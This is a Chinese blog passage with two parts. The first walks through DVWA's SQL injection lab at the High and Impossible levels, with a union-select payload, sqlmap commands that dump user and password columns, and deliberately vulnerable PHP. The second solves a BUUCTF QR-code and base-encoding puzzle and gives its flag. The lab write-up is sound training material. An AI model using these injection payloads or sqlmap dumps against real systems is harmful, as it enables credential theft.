		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
	}

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

High

1、点击链接弹出小窗，提交1，使用BurpSuite抓包。

尝试放包，回显信息出现在原页面

2、注入方式与Low、Medium级别一致，最后得到user、password数据

1

1' union select user,password from users#

SQLmap工具使用

因为提交数据与回显数据的页面不同，所以需要添加第二个回显地址。将第一步抓到的数据保存在桌面，命名为1.txt文件，使用 -r 参数指定文件路径。 --second-url 参数指定会先页面URL。

1

sqlmap -r C:\Users\yuexuan\Desktop\1.txt --second-url "http://dvwa/vulnerabilities/sqli/" --cookie "PHPSESSID=ef4ln5lm529kdmhri3meltn9lk; security=high" --batch --dbs

操作步骤与前面一致，最后得到user、password数据

1

sqlmap -r C:\Users\yuexuan\Desktop\1.txt --second-url "http://dvwa/vulnerabilities/sqli/" --cookie "PHPSESSID=ef4ln5lm529kdmhri3meltn9lk; security=high" --batch -D dvwa -T users -C user,password --dump

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24


php

if( isset( $_SESSION [ 'id' ] ) ) {
	// Get input
	$id = $_SESSION[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( 'Something went wrong.' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);		
}

?>

Impossible

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33


php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
       // Check the database
       $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
       $data->bindParam( ':id', $id, PDO::PARAM_INT );
       $data->execute();
       $row = $data->fetch();

       // Make sure only 1 result is returned
       if( $data->rowCount() == 1 ) {
          // Get values
          $first = $row[ 'first_name' ];
          $last  = $row[ 'last_name' ];

          // Feedback for end user
          $html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
       }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

BUUCTF [安洵杯 2019]吹着贝斯扫二维码 1

Wed, 21 Feb 2024 20:18:10 +0000

BUUCTF: https://buuoj.cn/challenges

题目描述：

得到的 flag 请包上 flag{} 提交。

密文：

下载附件解压，得到很多没有后缀的文件和一个ZIP压缩包。

解题思路：

1、首先，查看ZIP压缩包，发现有密码，并且在压缩包的注释找到疑似被加密的压缩包密码，初步解密失败。

1

GNATOMJVIQZUKNJXGRCTGNRTGI3EMNZTGNBTKRJWGI2UIMRRGNBDEQZWGI3DKMSFGNCDMRJTII3TMNBQGM4TERRTGEZTOMRXGQYDGOBWGI2DCNBY

查看其他的无后缀文件，在010Editor中观察到jpg文件的文件头，猜测为jpg文件。

1

JPEG (jpg) 　　文件头：FF D8 FF　　 文件尾：FF D9

修改文件后缀为.jpg，发现是二维码的一部分，其他文件是一样的，共36个二维码碎片。

2、二维码应该存在解开压缩包的线索。先将所有的无后缀文件改为.jpg文件，可以手动添加，也可以使用python脚本完成。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


#coding=UTF-8
import os

path = 'D:\\CTF\\CTF_topic\\吹着贝斯扫二维码'   # 需要添加后缀的文件路径
for i in os.listdir('D:\\CTF\\CTF_topic\\吹着贝斯扫二维码'):
	if i == 'flag.zip':
		continue
	else:
		oldname = os.path.join(path, i)
		newname = os.path.join(path, i+'.jpg')
		os.rename(oldname, newname)

然后，使用Ps软件将所有二维码碎片组合起来，恢复原有的二维码，跟玩拼图一样。（但是真的很慢）

3、扫描二维码，得到加密字符串的加密顺序，如下：

加密顺序：base85 » base64 » base85 » rot13 » base16 » base32

解密只需要按照加密顺序反转进行解密就可以啦

解密顺序：base32 » base16 » rot13 » base85 » base64 » base85

1

GNATOMJVIQZUKNJXGRCTGNRTGI3EMNZTGNBTKRJWGI2UIMRRGNBDEQZWGI3DKMSFGNCDMRJTII3TMNBQGM4TERRTGEZTOMRXGQYDGOBWGI2DCNBY

base32 https://the-x.cn/encodings/Base32.aspx

1

3A715D3E574E36326F733C5E625D213B2C62652E3D6E3B7640392F3137274038624148

base16 https://www.qqxiuzi.cn/bianma/base.php?type=16

1

:q]>WN62os<^b]!;,be.=n;v@9/17'@8bAH

rot13 https://lzltool.cn/Tools/Rot13

1

:d]>JA62bf<^o]!;,or.=a;i@9/17'@8oNU

base85 http://www.atoolbox.net/Tool.php?Id=934

1

PCtvdWU4VFJnQUByYy4mK1lraTA=

base64 https://base64.supfree.net/

1

<+oue8TRgA@rc.&+Yki0

base85 （解密需使用ASCII85编码标准） http://www.hiencode.com/base85.html

1

ThisIsSecret!233

4、得到明文，使用它解压压缩包，得到flag.txt文件。

flag：

1

flag{Qr_Is_MeAn1nGfuL}